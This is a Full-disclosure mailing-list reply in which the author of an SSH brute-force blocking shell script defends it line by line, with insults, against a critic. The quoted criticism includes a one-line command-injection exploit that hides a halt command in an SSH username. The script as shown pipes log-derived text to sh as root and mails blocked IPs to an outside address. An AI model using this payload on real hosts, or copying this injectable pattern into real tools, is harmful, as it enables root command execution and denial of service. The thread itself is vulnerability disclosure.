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Re: [Full-disclosure] SSH brute force blocking tool

Tavis Ormandy wrote:

Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

ssh 'foo bar `/sbin/halt`'@victim

Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory)

if [ `whoami` != root ]

       then  echo "This script needs to run under the root user"


if [ -e /tmp/hosts.deny ]

                rm /tmp/hosts.deny

Check to see if the user is root. If not, tell the user "Hey dumbass, you
need to be root", if the user is root, continue.

awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny

There is no hocus pocus here. Look at /var/log/secure and fine the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny
into /etc/hosts.deny

OS=$( uname|sed -n '1p')

This is a no brainer. No voodoo there.

# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'`

Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 192.168, print the second field, and replace the term addr: with nothing. No voodoo here jackass.

function IPT {

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh


This is such a hacker thing coming now. You caught me.

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk hacking)

if [ $OS = Linux ]



This is where I guess I hack the world. Check the OS and if it's Linux, then

cat /etc/hosts.deny

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk hacking) then print iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT
$1 = IP address
$ifaddr = IP address of the interface

echo "Copying sharpener to /usr/local/bin"
sed -n '1,67p' ./sharpener > /usr/local/bin/sharpener
echo "fi" >> /usr/local/bin/sharpener
rm ./sharpener

Here goes the voodoo... You ready?

print lines from 1 through 67 of this same file but put it in /usr/local/sharpener
add a fi to that same file then remove the original

sleep 2
echo ""
echo "Adding Sharpener to cron"
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener"

if [ -e /var/spool/cron/root ]

echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/spool/cron/root

if [ -e /var/cron/tabs/root ]

echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/cron/tabs/root



Add it to cron


awk '!/192.168/ &&
!/127./ &&
!/#/ &&
!/172.32/{print $1" has been blocked via SSH"}' /etc/hosts.deny |\

mail -s "Sharpener" sharpener@xxxxxxxxxxxxxxx


Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, and ignore 172.32 then mail it to an evil hacker site so they can traverse telekinetically into your machine.


J. Oquendo
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams

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